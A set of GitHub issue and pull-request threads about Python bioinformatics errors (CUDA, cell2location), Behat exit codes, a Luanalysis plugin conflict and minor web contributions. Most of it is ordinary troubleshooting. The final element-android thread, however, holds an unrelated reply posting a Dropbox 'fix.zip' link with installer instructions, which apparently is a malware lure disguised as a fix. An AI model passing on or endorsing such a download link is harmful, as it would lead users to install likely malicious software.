--> 796 _, device = parse_use_gpu_arg(use_gpu)
798 batch_size = batch_size if batch_size is not None else settings.batch_size
800 train_dl = AnnDataLoader(
801 self.adata_manager, shuffle=False, batch_size=batch_size
802 )
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/scvi/model/_utils.py:40, in parse_use_gpu_arg(use_gpu, return_device)
38 device = torch.device("cpu")
39 elif (use_gpu is None and gpu_available) or (use_gpu is True):
---> 40 current = torch.cuda.current_device()
41 device = torch.device(current)
42 gpus = [current]
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/torch/cuda/init.py:481, in current_device()
479 def current_device() -> int:
480 r"""Returns the index of a currently selected device."""
--> 481 _lazy_init()
482 return torch._C._cuda_getDevice()
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/torch/cuda/init.py:210, in _lazy_init()
206 raise RuntimeError(
207 "Cannot re-initialize CUDA in forked subprocess. To use CUDA with "
208 "multiprocessing, you must use the 'spawn' start method")
209 if not hasattr(torch._C, '_cuda_getDeviceCount'):
--> 210 raise AssertionError("Torch not compiled with CUDA enabled")
211 if _cudart is None:
212 raise AssertionError(
213 "libcudart functions unavailable. It looks like you have a broken build?")
AssertionError: Torch not compiled with CUDA enabled
It looks like I could edit some of the functions so they don't expect CUDA, but I am not sure where that should be done. If you could please help me, I would love to be able to use this package on my data. Thanks!
Hello @joaoufrj,
Could you please try setting the use_gpu argument to False in the sample_kwargs as follows:
sample_kwarg = {"num_samples": 20, "batch_size" : 2000,
"use_gpu" : False, 'return_samples': True}
adata = mod.export_posterior(adata, sample_kwargs=sample_kwarg)
With this change, you should be able to export posteriors without using CUDA.
|
2025-04-01T06:36:46.479381
| 2022-09-12T10:04:08
|
1369610660
|
{
"authors": [
"YaoZY157",
"masoodlab"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:421",
"repo": "BayraktarLab/cell2location",
"url": "https://github.com/BayraktarLab/cell2location/issues/199"
}
|
gharchive/issue
|
AttributeError: module 'cell2location' has no attribute 'run_cell2location'
[x] I have confirmed this bug exists on the latest version of cell2location. See https://github.com/BayraktarLab/cell2location#installation
[ ] I follow the instructions from the scvi-tools tutorial.
Note: Please read this guide detailing how to provide the necessary information for us to reproduce your bug.
Minimal code sample (that we can run without your data, using public data)
Hi, guys!
When I run the official workflow ( https://cell2location.readthedocs.io/en/latest/notebooks/cell2location_short_demo.html),
I run into the error: AttributeError: module 'cell2location' has no attribute 'run_cell2location'.
I installed it according to the official website (https://github.com/BayraktarLab/cell2location).
import sys
import scanpy as sc
import anndata
import pandas as pd
import numpy as np
import os
import gc
import cell2location
import matplotlib as mpl
from matplotlib import rcParams
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
#The official website process has been omitted( https://cell2location.readthedocs.io/en/latest/notebooks/cell2location_short_demo.html)
sc.settings.set_figure_params(dpi = 100, color_map = 'viridis', dpi_save = 100,
vector_friendly = True, format = 'pdf',
facecolor='white')
r = cell2location.run_cell2location(
# Single cell reference signatures as pd.DataFrame
# (could also be data as anndata object for estimating signatures
# as cluster average expression - `sc_data=adata_snrna_raw`)
sc_data=inf_aver,
# Spatial data as anndata object
sp_data=adata_vis,
# the column in sc_data.obs that gives cluster idenitity of each cell
summ_sc_data_args={'cluster_col': "annotation_1",
},
train_args={'use_raw': True, # By default uses raw slots in both of the input datasets.
'n_iter': 40000, # Increase the number of iterations if needed (see QC below)
# Whe analysing the data that contains multiple experiments,
# cell2location automatically enters the mode which pools information across experiments
'sample_name_col': 'sample'}, # Column in sp_data.obs with experiment ID (see above)
export_args={'path': results_folder, # path where to save results
'run_name_suffix': '' # optinal suffix to modify the name the run
},
model_kwargs={ # Prior on the number of cells, cell types and co-located groups
'cell_number_prior': {
# - N - the expected number of cells per location:
'cells_per_spot': 8, # < - change this
# - A - the expected number of cell types per location (use default):
'factors_per_spot': 7,
# - Y - the expected number of co-located cell type groups per location (use default):
'combs_per_spot': 7
},
# Prior beliefs on the sensitivity of spatial technology:
'gene_level_prior':{
# Prior on the mean
'mean': 1/2,
# Prior on standard deviation,
# a good choice of this value should be at least 2 times lower that the mean
'sd': 1/4
}
}
)
sc.logging.print_versions()
anndata 0.8.0
scanpy 1.9.1
PIL 9.2.0
absl NA
asttokens NA
attr 22.1.0
backcall 0.2.0
beta_ufunc NA
binom_ufunc NA
cell2location NA
cffi 1.15.1
chex 0.1.4
colorama 0.4.5
cycler 0.10.0
cython_runtime NA
dateutil 2.8.2
decorator 5.1.1
defusedxml 0.7.1
deprecate 0.3.2
docrep 0.3.2
entrypoints 0.4
etils 0.7.1
executing 0.10.0
flax 0.6.0
fsspec 2022.7.1
google NA
h5py 3.7.0
hypergeom_ufunc NA
igraph 0.9.11
ipykernel 6.15.1
ipython_genutils 0.2.0
ipywidgets 7.7.1
jax 0.3.16
jaxlib 0.3.15
jedi 0.18.1
joblib 1.1.0
kiwisolver 1.4.4
leidenalg 0.8.10
llvmlite 0.39.0
matplotlib 3.5.3
matplotlib_inline 0.1.5
mpl_toolkits NA
msgpack 1.0.4
mudata 0.2.0
multipledispatch 0.6.0
natsort 8.1.0
nbinom_ufunc NA
ncf_ufunc NA
numba 0.56.0
numpy 1.22.4
numpyro 0.10.0
opt_einsum v3.3.0
optax 0.1.3
packaging 21.3
pandas 1.4.3
parso 0.8.3
pexpect 4.8.0
pickleshare 0.7.5
pkg_resources NA
prompt_toolkit 3.0.30
psutil 5.9.1
ptyprocess 0.7.0
pure_eval 0.2.2
pycparser 2.21
pygments 2.13.0
pynndescent 0.5.7
pyparsing 3.0.9
pyro 1.8.1
pytorch_lightning 1.6.5
pytz 2022.2.1
rich NA
scipy 1.9.0
scvi 0.17.1
seaborn 0.11.2
session_info 1.0.0
setuptools 65.0.1
six 1.16.0
sklearn 1.1.2
stack_data 0.4.0
statsmodels 0.13.2
tensorboard 2.9.0
texttable 1.6.4
threadpoolctl 3.1.0
toolz 0.12.0
torch 1.12.1+cu102
torchmetrics 0.9.3
tornado 6.2
tqdm 4.64.0
traitlets 5.3.0
tree 0.1.7
typing_extensions NA
umap 0.5.3
wcwidth 0.2.5
yaml 6.0
zipp NA
zmq 23.2.1
IPython 8.4.0
jupyter_client 7.3.4
jupyter_core 4.11.1
notebook 6.4.12
Python 3.9.13 | packaged by conda-forge | (main, May 27 2022, 16:58:50) [GCC 10.3.0]
Linux-3.10.0-957.el7.x86_64-x86_64-with-glibc2.17
Session information updated at 2022-09-12 17:53
AttributeError Traceback (most recent call last)
Input In [19], in <cell line: 1>()
----> 1 r = cell2location.run_cell2location(
2
3 # Single cell reference signatures as pd.DataFrame
4 # (could also be data as anndata object for estimating signatures
5 # as cluster average expression - `sc_data=adata_snrna_raw`)
6 sc_data=inf_aver,
7 # Spatial data as anndata object
8 sp_data=adata_vis,
9
10 # the column in sc_data.obs that gives cluster idenitity of each cell
11 summ_sc_data_args={'cluster_col': "annotation_1",
12 },
13
14 train_args={'use_raw': True, # By default uses raw slots in both of the input datasets.
15 'n_iter': 40000, # Increase the number of iterations if needed (see QC below)
16
17 # Whe analysing the data that contains multiple experiments,
18 # cell2location automatically enters the mode which pools information across experiments
19 'sample_name_col': 'sample'}, # Column in sp_data.obs with experiment ID (see above)
20
21
22 export_args={'path': results_folder, # path where to save results
23 'run_name_suffix': '' # optinal suffix to modify the name the run
24 },
25
26 model_kwargs={ # Prior on the number of cells, cell types and co-located groups
27
28 'cell_number_prior': {
29 # - N - the expected number of cells per location:
30 'cells_per_spot': 8, # < - change this
31 # - A - the expected number of cell types per location (use default):
32 'factors_per_spot': 7,
33 # - Y - the expected number of co-located cell type groups per location (use default):
34 'combs_per_spot': 7
35 },
36
37 # Prior beliefs on the sensitivity of spatial technology:
38 'gene_level_prior':{
39 # Prior on the mean
40 'mean': 1/2,
41 # Prior on standard deviation,
42 # a good choice of this value should be at least 2 times lower that the mean
43 'sd': 1/4
44 }
45 }
46 )
AttributeError: module 'cell2location' has no attribute 'run_cell2location'
I am getting the same error message. Were you able to find a solution?
Sorry, I still have no idea (@_@).
|
2025-04-01T06:36:46.505612
| 2024-07-31T17:17:07
|
2440528878
|
{
"authors": [
"Maxnflaxl",
"messiisgreat"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:422",
"repo": "BeamMW/beam-web",
"url": "https://github.com/BeamMW/beam-web/pull/262"
}
|
gharchive/pull-request
|
Fix HF section
Checkout Points
[ ] Check if renaming to PoC done
[ ] Check if changing icons(5) done
[ ] Check if adding HF to menu(in dropdown and footer) done
Suggestion
Suggest better approach
can you send a screenshot of the 2023 and 2024 roadmap to confirm changes? Ty
check this plz
screenshot please ^^
|
2025-04-01T06:36:46.583856
| 2023-10-10T18:29:45
|
1935962022
|
{
"authors": [
"Rockleemode",
"XanderRubio"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:423",
"repo": "BeforeIDieCode/BeforeIDieAchievements",
"url": "https://github.com/BeforeIDieCode/BeforeIDieAchievements/pull/176"
}
|
gharchive/pull-request
|
Add Ma'aruf Muhammad to Before I Die
I am adding Ma'aruf Muhammad to Before I Die with images and text
Hi @Rockleemode,
Thank you for taking the time to contribute and share your aspirations on what you would like to do before you pass away. I kindly request that you run the React app on your local development server to see your contributions working. Currently, we are encountering an error with the preview deployment that is related to the React version being used. To make this process smoother, please go through your code again, ensure that you can see your code working on your development server, and then recommit. I may have to go through the code manually to avoid the dependency error being shown in the terminal. I will merge your code as soon as possible. However, if you could assist me by running your code on your local server and recommitting it within the next ten hours, it would be greatly appreciated as it will save me time when reviewing. Thank you, @Rockleemode, and have a great day!
Xander
Yes, please go ahead @Rockleemode. Thank you for your patience, and I apologize for having to ask. I think the package.json file might have changed recently on main after several pull requests we merged, and this is causing an issue with preview deployments from new contributors, as I'm now seeing the same issue on another pull request and will need to dive further into it. For now, recommit and we will see if this possibly helps with the preview deployment. Thank you!
|
2025-04-01T06:36:46.586071
| 2023-10-16T05:41:02
|
1944407542
|
{
"authors": [
"XanderRubio",
"ignoreintuition"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:424",
"repo": "BeforeIDieCode/BeforeIDieAchievements",
"url": "https://github.com/BeforeIDieCode/BeforeIDieAchievements/pull/205"
}
|
gharchive/pull-request
|
Added profile for Brian Greig
Added profile and pictures
Also, @ignoreintuition if you have a LinkedIn let me know the link so I can mention you in our next Thank You Contributors post. Thank you!
Absolutely @XanderRubio it's https://www.linkedin.com/in/bgreig/
|
2025-04-01T06:36:46.589669
| 2024-11-21T11:11:01
|
2679070135
|
{
"authors": [
"mvorisek",
"stof"
],
"license": "mit",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:425",
"repo": "Behat/Behat",
"url": "https://github.com/Behat/Behat/issues/1541"
}
|
gharchive/issue
|
Missing step does not exit with non-zero CLI code
CLI output like:
Feature: Checkbox
Scenario: # tests-behat/checkbox.feature:3
Given I am on "form-control/checkbox.php" # Behat\MinkExtension\Context\MinkContext::visit()
...
Then Toast display should contain text '...'
1 scenario (1 undefined)
8 steps (2 passed, 2 undefined, 4 skipped)
0m1.86s (12.32Mb)
>> <snippet_undefined><snippet_keyword>main</snippet_keyword> suite has undefined steps.
Please choose the context to generate snippets:</snippet_undefined>
[0] None
[1] Behat\MinkExtension\Context\MinkContext
[2] Atk4\Ui\Behat\Context
--- Behat\MinkExtension\Context\MinkContext has missing steps. Define them with these snippets:
/**
* @Then Toast display should contain text :arg4
*/
public function toastDisplayShouldContainText($arg1, $arg2, $arg3, $arg4): void
{
throw new PendingException();
}
silently exits with a zero CLI exit code, making it very hard to fail CI.
This is already partially possible in Behat. The --strict option will consider that skipped or pending scenarios should make the run use a failure exit code.
Maybe we need a third way of interpreting results which would allow skipped scenarios but reject pending ones.
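For reference, enabling it is just a CLI flag; a typical invocation would look something like the following (the vendor/bin path is an assumption about a Composer-based setup):
vendor/bin/behat --strict
With --strict, anything that is not explicitly passing (undefined, pending, skipped) makes the run exit non-zero, so CI fails as expected.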
Thank you very much for mentioning the --strict option - it does exactly what I want.
I personally would make it the default, as CI should fail in case of undefined steps.
|
2025-04-01T06:36:46.601208
| 2017-11-28T21:58:41
|
277552794
|
{
"authors": [
"SairamShanmuganathan",
"ghost"
],
"license": "Unlicense",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:426",
"repo": "BenJam/proverif",
"url": "https://github.com/BenJam/proverif/issues/2"
}
|
gharchive/issue
|
Update syntax
All of these examples got syntax errors. How can I run them on the new version of Proverif Online?
Did you get any code for the new version?
|
2025-04-01T06:36:46.611843
| 2021-12-30T10:39:11
|
1091020099
|
{
"authors": [
"Benedict-Carling",
"shrutiichandra"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:427",
"repo": "Benedict-Carling/spanish-conjugator",
"url": "https://github.com/Benedict-Carling/spanish-conjugator/pull/29"
}
|
gharchive/pull-request
|
conditional conjugation
added conjugation for conditional tense.
Looks great, thanks so much for the work!
Happy to help!!
|
2025-04-01T06:36:46.617886
| 2021-06-05T13:42:43
|
912269708
|
{
"authors": [
"Benjamin-Dobell",
"kerwanp"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:428",
"repo": "Benjamin-Dobell/IntelliJ-Luanalysis",
"url": "https://github.com/Benjamin-Dobell/IntelliJ-Luanalysis/issues/75"
}
|
gharchive/issue
|
Key duplicated on Windows
Environment
name
version
IDEA version
2021.1.2 Build #IU-211.7442.40
Luanalysis version
v1.2.3
OS
Windows 10
What are the steps to reproduce this issue?
Install Luanalysis
Restart the IDE
What happens?
The IDE does not start and shows a critical error.
What were you expecting to happen?
The IDE starting properly.
Any logs, error output, etc?
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - Start Failed
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - Internal error. Please refer to https://jb.gg/ide/critical-startup-errors
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR -
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - java.util.concurrent.CompletionException: org.picocontainer.PicoRegistrationException: Key com.tang.intellij.lua.luacheck.LuaCheckSettings duplicated
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.encodeThrowable(CompletableFuture.java:314)
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.uniApplyNow(CompletableFuture.java:683)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.uniApplyStage(CompletableFuture.java:658)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.thenApply(CompletableFuture.java:2094)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader.registerAppComponents(ApplicationLoader.kt:104)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader.executeInitAppInEdt(ApplicationLoader.kt:63)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader.access$executeInitAppInEdt(ApplicationLoader.kt:1)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader$initApplication$1$1.run(ApplicationLoader.kt:363)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:776)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:727)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.security.AccessController.doPrivileged(Native Method)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:746)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - Caused by: org.picocontainer.PicoRegistrationException: Key com.tang.intellij.lua.luacheck.LuaCheckSettings duplicated
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.util.pico.DefaultPicoContainer.registerComponent(DefaultPicoContainer.java:119)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.serviceContainer.ComponentManagerImpl.registerServices(ComponentManagerImpl.kt:400)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.serviceContainer.ComponentManagerImpl.registerComponents(ComponentManagerImpl.kt:250)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader$registerAppComponents$1.apply(ApplicationLoader.kt:106)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader$registerAppComponents$1.apply(ApplicationLoader.kt)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.uniApplyNow(CompletableFuture.java:680)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - ... 19 more
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR -
2021-06-05 15:28:08,488 [ 1290] INFO - STDERR - -----
Getting the same problem on Debian GNU/Linux 10 (buster)
@kerwanp I believe this occurs when you have both Luanalysis and EmmyLua installed simultaneously.
Luanalysis was forked from EmmyLua. The initial goal was to contribute everything upstream, so EmmyLua's settings (and storage thereof) were left unaltered. However, since then, Luanalysis' internals have diverged quite considerably from EmmyLua. At this point it would be wise for me to go back through and stop making use of the com.tang.intellij.lua scope, which quite rightly belongs to EmmyLua.
For now, please ensure EmmyLua is not installed alongside Luanalysis.
That was indeed the problem, closing the issue.
|
2025-04-01T06:36:46.620818
| 2024-08-26T00:58:16
|
2485608778
|
{
"authors": [
"Benjamin-Loison",
"esttemanb"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:429",
"repo": "Benjamin-Loison/element-android",
"url": "https://github.com/Benjamin-Loison/element-android/issues/27"
}
|
gharchive/issue
|
Check easily up to when histories go?
Concerning Note to Self, it is the same date as on my Linux Mint 22 Cinnamon Framework 13, that is about:
date -d @1650663424
Fri Apr 22 11:37:04 PM CEST 2022
Would help Benjamin-Loison/android/issues/46.
On computer, one can use Export Chat.
Download
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
|